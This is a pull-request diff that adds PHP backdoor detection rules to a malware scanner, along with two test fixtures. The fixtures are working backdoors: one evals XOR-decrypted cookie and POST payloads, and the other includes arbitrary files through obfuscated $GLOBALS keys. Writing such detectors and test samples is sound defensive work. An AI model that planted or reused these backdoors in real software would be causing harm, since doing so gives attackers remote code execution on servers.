Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
24 changes: 24 additions & 0 deletions src/Exploits.php
Original file line number Diff line number Diff line change
Expand Up @@ -431,6 +431,30 @@ class Exploits
'pattern' => '/[;\s]*sg\_load[\s]*\([\s]*[\\\'\"][A-Za-z0-9+\/]{150,}={0,3}[\\\'\"][\s]*\)/i',
'link' => 'https://www.sourceguardian.com',
],
// cookie/session-based PHP backdoor: $_COOKIE is assigned to a local var then accessed via substr key
'cookie_backdoor' => [
'description' => 'Cookie-based backdoor that reads HTTP cookie data using a substring of an obfuscated key to retrieve and execute malicious payloads',
'level' => CodeMatch::DANGEROUS,
'pattern' => '/\$_COOKIE[\s]*;.*?@?\$\w+[\s]*\[[\s]*substr[\s]*\(/si',
Comment on lines +435 to +438

Copy link
Copy Markdown
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@copilot apply changes based on this feedback

],
// XOR decryption via str_repeat used in cookie/session-based backdoors
'xor_str_repeat' => [
'description' => 'XOR decryption using str_repeat is typically used in cookie-based PHP backdoors to decode and execute malicious payloads',
'level' => CodeMatch::DANGEROUS,
'pattern' => '/\$\w+[\s]*\[[\s]*0[\s]*\][\s]*\^[\s]*str_repeat[\s]*\(/i',
],
// str_replace stripping PHP opening tag then eval — used to execute injected code
'str_replace_eval' => [
'description' => 'Stripping PHP opening tags via str_replace with an empty replacement and then passing the result to eval, commonly used in obfuscated backdoors',
'level' => CodeMatch::DANGEROUS,
'pattern' => '/str_replace[\s]*\([^,]+,[\s]*["\']["\'][\s]*,.*?\)[\s]*;[^;]*eval[\s]*\(/si',
],
// urldecode/rawurldecode function name built via string concatenation to evade detection
'urldecode_obfuscation' => [
'description' => 'Obfuscated urldecode or rawurldecode function call built via string concatenation, typically used to hide XOR-based payload decoding in backdoors',
Comment on lines +452 to +454
'level' => CodeMatch::DANGEROUS,
'pattern' => '/["\']url["\'][\s]*\.[\s]*["\']decode["\']/i',
],
];

/**
Expand Down
49 changes: 49 additions & 0 deletions tests/Fixtures/malware/cookie_backdoor.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,49 @@
<?php

/**
* Cookie-based PHP backdoor.
* Reads HTTP cookie data using a substring of an obfuscated UUID key,
* base64-decodes the combined cookie/POST values, XOR-decrypts them
* with the UUID as key, unserializes the result, and evals the payload.
* Should be detected by the scanner (cookie_backdoor, xor_str_repeat, str_replace_eval).
*/

class BackdoorLoader
{
private function loadPayload($arg)
{
if (is_array(BackdoorLoader::$store)) {
$code = str_replace('<?php', '', BackdoorLoader::$store['content']);
eval($code);
exit();
}
}

public function __destruct()
{
$this->loadPayload('arg');
}

public function __construct($arg = 0)
{
$post = $_POST;
$cookies = $_COOKIE;
$key = '301407a7-7bdd-4637-b5c9-06e442e49d5a';
$data = @$cookies[substr($key, 0, 4)];
if (!empty($data)) {
$parts = explode(',', $data);
$raw = '';
foreach ($parts as $part) {
$raw .= @$cookies[$part];
$raw .= @$post[$part];
}
$raw = array_map('base64_decode', array($raw));
$raw = $raw[0] ^ str_repeat($key, (strlen($raw[0]) / strlen($key)) + 1);
BackdoorLoader::$store = @unserialize($raw);
}
}

public static $store = false;
}

$loader = new BackdoorLoader(0);
28 changes: 28 additions & 0 deletions tests/Fixtures/malware/globals_include_backdoor.php
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
<?php

/**
* Globals include backdoor using XOR-decoded key and obfuscated urldecode call.
* Accesses $GLOBALS using a key derived from XOR of a urldecoded obfuscated string,
* then includes an arbitrary file path extracted from global state.
* Should be detected by the scanner (urldecode_obfuscation).
*/

function _backdoor_entry()
{
$seed = 'f97L4Hyn8Jg';
$target = $GLOBALS[_xor_decode('9%7F%7E%00q%1B', $seed)];
if (isset($target[$seed])) {
$file = $target[$seed][_xor_decode('%12TG%13Z%29%14%0B', $seed)];
include($file);
}
}

function _xor_decode($encoded, $key)
{
$fn = 'url' . 'decode';
$decoded = $fn($encoded);
$mask = substr($key, 0, strlen($decoded));
return $decoded ^ $mask;
}

_backdoor_entry();
Loading